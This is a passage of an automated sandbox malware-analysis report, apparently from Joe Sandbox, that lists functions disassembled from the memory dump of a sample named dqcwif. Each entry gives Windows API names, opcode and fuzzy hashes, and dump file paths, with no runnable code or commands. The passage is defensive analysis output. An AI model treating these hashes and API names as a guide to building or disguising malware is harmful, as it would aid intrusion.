                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 918212764-0
                                                                                                          • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                                          • Instruction ID: 8c5d55b64bcfa465f0c9935ee311b694f11ae4c4f013a6fadff6cf2b28af7720
                                                                                                          • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                                          • Instruction Fuzzy Hash: DA11D611B0C38641FEA6572DA5F43FC52925F96F64F080275DB2EC62DBCD6CAC848201
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Init_thread_footer
                                                                                                          • String ID:
                                                                                                          • API String ID: 1385522511-0
                                                                                                          • Opcode ID: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                                                          • Instruction ID: e65b090bd6794f10d7e0404a75a8f05b9bbc9b1da8864a2b2db5725a8c1901b7
                                                                                                          • Opcode Fuzzy Hash: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                                                          • Instruction Fuzzy Hash: EE329D66A0868286EB70CF1AD4A42F96765FB86F84F144136DB4E9779BDF3CEC418700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClearVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 1473721057-0
                                                                                                          • Opcode ID: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                                                          • Instruction ID: 02d7196026301928f31825c4bd6f9fdbcfa4f49110b08c1d4c98f8e8a0f8fab6
                                                                                                          • Opcode Fuzzy Hash: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                                                          • Instruction Fuzzy Hash: 30414B22B08A4286EB21AF69D0613EC23A0FB45F88F544535CF0DA779ADF78E856C351
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 3947729631-0
                                                                                                          • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                                          • Instruction ID: 192ec1ba73c4d9443c30e1dc4142c0a6cda467a1c47464fab33e667991270e3f
                                                                                                          • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                                          • Instruction Fuzzy Hash: 3C416161A0865282FE649B1DE4B51F82361AF56F40F14443AEB0E877DBDF3EEC818B40
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 3215553584-0
                                                                                                          • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                                          • Instruction ID: 1e4de366a1868de0da29c7512b7c91d635b7a8d38b3c733d1fc4b94a242e1932
                                                                                                          • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                                          • Instruction Fuzzy Hash: 52215161A1C68281FA69AF19F4312BE9260BF46F84F144030EB4DDBA8FDE7CDD418740
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 3215553584-0
                                                                                                          • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                                          • Instruction ID: 450219615e18032b5642261c7a7ab2cf52e0880d6573b6af1f783b3780ece6ce
                                                                                                          • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                                          • Instruction Fuzzy Hash: B621B53261878247E7658F28E4613A9B6A1FB86F90F144238DB5DCA6DADF2CDC018700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 3215553584-0
                                                                                                          • Opcode ID: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                                                          • Instruction ID: beaa6c8c999c313c70dafa24c9b454a24b6d185caae0a4a024a23def030d3f88
                                                                                                          • Opcode Fuzzy Hash: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                                                          • Instruction Fuzzy Hash: 87114F7291C68282F6289B59F4715B963A5FB4AB80F940079E78DCB79FDF2DEC418700
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                                          • Instruction ID: f54aebf4c7895e3e96d29c06c4ff0568feff2ad3826452e7c27fccb25e6ba84e
                                                                                                          • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                                          • Instruction Fuzzy Hash: B2112826A19A4582EF449F1AD0A07B86360EB86FA1F545132DF1E873AACF3DD9908700
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                                          • Instruction ID: 9de58b1385aff36401e426bb94de092b0ac5e7f981ca57be860b7b2c02c0c106
                                                                                                          • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                                          • Instruction Fuzzy Hash: 2B11B27290878A86EA1A9F19E4603ECB761EB81B61F504136D74D4A2DBCF7CD801CB00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 3215553584-0
                                                                                                          • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                                          • Instruction ID: 3bfb51dfa1c722516d0ae7cf456db0a00ab2906f73124d292247380ff5cdea35
                                                                                                          • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                                                          • Instruction Fuzzy Hash: B4011E21A0964645FD2CBA6DF4333F951905F96F64F241630EB2ECA2DBCE2CEC424601
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 3215553584-0
                                                                                                          • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                                          • Instruction ID: 0393fe3c13571a6027b2754c6408eb885249f10a0bd9a208e78a1d66a8149bdf
                                                                                                          • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                                                          • Instruction Fuzzy Hash: 91F06D21A0C6434AF92C766DF4322FA22909F42B50F241130EB5AC66CFCE2CEC428601
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF6B5B54970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B5B54999
                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF6B5B6C8FE), ref: 00007FF6B5B2656F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 3938577545-0
                                                                                                          • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                                          • Instruction ID: e34384495e3b56ca523976d4a3ee075cbfe59618f0f243b2b18999ca8ab91f68
                                                                                                          • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                                                          • Instruction Fuzzy Hash: E2F05852A19A0986FF19DF79D0B637C27A0BB69F08F140538CB0E8A28ECF6DD8558351
                                                                                                          APIs
                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B5B44C5C
                                                                                                            • Part of subcall function 00007FF6B5B45600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6B5B45609
                                                                                                            • Part of subcall function 00007FF6B5B45600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF6B5B4561A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1680350287-0
                                                                                                          • Opcode ID: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                                                                          • Instruction ID: 8c7e5eb30dd3bac308b0898adb1560294f886deb449ce51291fce626be67445b
                                                                                                          • Opcode Fuzzy Hash: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                                                                          • Instruction Fuzzy Hash: 49E0B650E1D20B46FA7CB56E15765F801400F5BF70E5C1B30EB3DC52CBAD2CAC654510
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                                          • Instruction ID: a0ae14a6fe50877176140812e080706aa4fbe64ddba22d8bd59ee428b3f34a19
                                                                                                          • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                                          • Instruction Fuzzy Hash: AAE03922618A9183D720CB06F44035AE370FB8ABD8F644525EF8C47B1ECF7DC9518B80
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongNamePath
                                                                                                          • String ID:
                                                                                                          • API String ID: 82841172-0
                                                                                                          • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                                          • Instruction ID: a311944d134f8b1026be888a77bd38f52149a13a1b1776c5e27fe03c17678b57
                                                                                                          • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                                          • Instruction Fuzzy Hash: F3E09222B0874281DB619729E1543E8A3A1BB8CBC4F044031EF8C8375FCDACC9848A00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_
                                                                                                          • String ID:
                                                                                                          • API String ID: 1144537725-0
                                                                                                          • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                                          • Instruction ID: 5ff85f7ddacdd4a62b8a3de482f7602f31d8eb46119557179be1bb4d79beb795
                                                                                                          • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                                          • Instruction Fuzzy Hash: 29F0822291979587E3A2DB58E4453A576A5F785B08F840039D28D8639FCF3CD705CF00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Open_onexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 3030063568-0
                                                                                                          • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                                          • Instruction ID: 8abaf5181d48c4069bf168a524708af47fa767b178cba09ae678a1d4830a902b
                                                                                                          • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                                          • Instruction Fuzzy Hash: 13E0C251F1A64BC1EE18B76DD8AA0F403A16F53F05F80553AC20CC235BEE6CD6A18704
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentVersionWow64_onexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 2932345936-0
                                                                                                          • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                                          • Instruction ID: a4b08f2615150be9fad07cf142e25f89ce40b6407235d0efa3477877e9c8e300
                                                                                                          • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                                          • Instruction Fuzzy Hash: 9EC01200E6A48B80E62C73BE48B70F401904FA7B40F900136C31DC0287ED0C55F60A11
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
